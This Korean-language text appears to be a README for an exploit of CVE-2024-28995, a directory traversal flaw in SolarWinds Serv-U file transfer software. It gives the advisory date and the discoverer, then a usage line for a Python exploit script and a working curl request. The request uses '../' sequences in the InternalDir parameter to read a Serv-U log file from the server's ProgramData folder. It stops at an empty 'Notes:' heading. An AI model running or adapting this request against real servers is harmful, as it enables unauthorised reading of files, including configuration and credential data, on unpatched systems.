
CVE-2024-28995 익스플로잇
2024년 6월 5일, SolarWinds는 파일 전송 솔루션 Serv-U에 영향을 미치는 고심각도 디렉토리 트래버설 취약점인 CVE-2024-28995에 대한 권고를 발표했습니다. 이 취약점은 Web Immunify의 연구원 Hussein Daher에 의해 발견되었습니다.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
참고: